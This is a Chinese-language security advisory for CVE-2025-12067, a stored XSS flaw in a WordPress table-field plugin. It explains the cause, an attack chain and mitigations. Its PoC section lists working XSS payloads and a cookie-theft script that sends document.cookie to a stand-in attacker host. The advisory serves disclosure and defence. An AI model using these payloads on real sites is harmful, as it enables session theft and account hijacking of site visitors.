CVE-2025-12067 WordPress Table Field插件存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-12067

漏洞类型

存储型跨站脚本(XSS)

CVSS评分

6.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Table Field Add-on for ACF and SCF (WordPress插件)

漏洞概述

CVE-2025-12067是WordPress平台上一款名为Table Field Add-on的ACF和SCF字段插件存在的安全漏洞。该插件主要用于在WordPress中创建和管理表格字段，为用户提供便捷的表格数据输入和展示功能。然而，由于插件在处理用户输入时存在严重的输入验证和输出编码缺陷，导致应用程序无法有效防御恶意脚本的注入攻击。攻击者利用该漏洞可以在含有表格字段的页面中注入任意JavaScript代码，当其他用户访问这些被注入恶意脚本的页面时，浏览器会自动执行攻击代码，从而实现窃取用户会话信息、劫持用户账户、进行钓鱼攻击等恶意操作。由于该漏洞属于存储型XSS，恶意脚本会被永久保存在服务器端，所有访问受影响页面的用户都会受到攻击影响。漏洞影响范围涵盖所有使用该插件且版本在1.3.30及以下的WordPress网站，对于拥有Author级别或更高权限的认证用户均可尝试利用此漏洞发起攻击。

技术细节

该漏洞的根本原因在于Table Field插件对用户输入的表格单元格内容缺乏有效的输入清理和输出转义处理。在WordPress插件开发中，安全编码实践要求对所有用户可控的输入进行严格的过滤和验证，并对输出到HTML页面的内容进行适当的转义处理。然而，该插件的开发者在实现表格单元格内容的存储和展示功能时，直接将用户输入的内容插入到HTML页面中，未能应用htmlspecialchars()或类似函数对特殊字符进行实体编码转换。攻击者可以在表格单元格中注入包含JavaScript代码的恶意payload，如<script>alert(document.cookie)</script>或<img src=x onerror=恶意代码>等。由于该输入被存储在数据库中，每当页面被加载时，恶意代码都会被从数据库取出并直接输出到HTML中，导致浏览器将其作为合法脚本执行。攻击者通常需要具备WordPress网站的Author级别账户权限才能创建或编辑包含表格字段的内容，从而利用此漏洞。成功利用后，攻击者可以窃取访问者的认证Cookie、操作用户会话、修改页面内容或进行进一步的内网渗透攻击。

攻击链分析

STEP 1

步骤1

攻击者获取WordPress网站Author级别或更高权限的账户，可通过弱密码攻击、社会工程学或利用其他漏洞获取凭据

STEP 2

步骤2

攻击者登录WordPress后台，进入文章或页面编辑器，添加或编辑Table Field字段（ACF或SCF）

STEP 3

步骤3

在表格单元格的输入框中注入恶意XSS payload，如<script>alert(document.cookie)</script>或事件处理器属性

STEP 4

步骤4

保存或发布包含恶意代码的内容，payload被存储到数据库中，受影响页面或文章的HTML源代码包含未转义的恶意脚本

STEP 5

步骤5

当普通用户或管理员访问包含恶意表格的页面时，浏览器解析HTML并执行注入的JavaScript代码

STEP 6

步骤6

恶意脚本窃取用户Cookie、会话令牌或其他敏感信息，并发送到攻击者控制的服务器

STEP 7

步骤7

攻击者利用窃取的凭据劫持用户会话，执行未授权操作或进一步扩大攻击范围

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2025-12067 PoC: Stored XSS in Table Field Plugin -->
<!-- Requires WordPress account with Author-level permissions or higher -->

<!-- PoC Method 1: Using script tag -->
<script>
  // Malicious JavaScript payload
  // This will execute when any user views the affected page
  console.log('XSS Triggered');
  
  // Example: Steal session cookies
  var stolenCookies = document.cookie;
  
  // Example: Send stolen data to attacker-controlled server
  // fetch('https://attacker.com/steal?data=' + encodeURIComponent(stolenCookies));
</script>

<!-- PoC Method 2: Using img onerror event -->
<img src=x onerror="alert('Stored XSS - CVE-2025-12067')">

<!-- PoC Method 3: Using SVG element -->
<svg/onload=alert(document.domain)>

<!-- PoC Method 4: Using body onload event -->
<body onload=alert('CVE-2025-12067 XSS')>

<!-- Exploitation Steps:
1. Authenticate to WordPress with Author+ account
2. Navigate to post/page editor
3. Add a Table Field (ACF or SCF)
4. Insert malicious payload in any table cell
5. Save/publish the content
6. Any user visiting the page will trigger the XSS
-->

<!-- Recommended Payload for Cookie Theft -->
<script>
  new Image().src='https://attacker.example/log?c='+encodeURIComponent(document.cookie);
</script>

影响范围

Table Field Add-on for ACF and SCF <= 1.3.30

防御指南

临时缓解措施

在官方补丁发布前，可采取以下临时缓解措施：1) 立即审查并移除所有具有Author级别及以上权限的可疑账户；2) 暂时禁用或删除Table Field插件；3) 启用双因素认证(2FA)增强管理员账户安全；4) 使用安全插件对所有用户生成的内容进行HTML过滤；5) 限制低权限用户创建和编辑内容的权限；6) 部署Web应用防火墙规则拦截常见的XSS攻击向量；7) 加强对WordPress后台登录活动的监控和告警。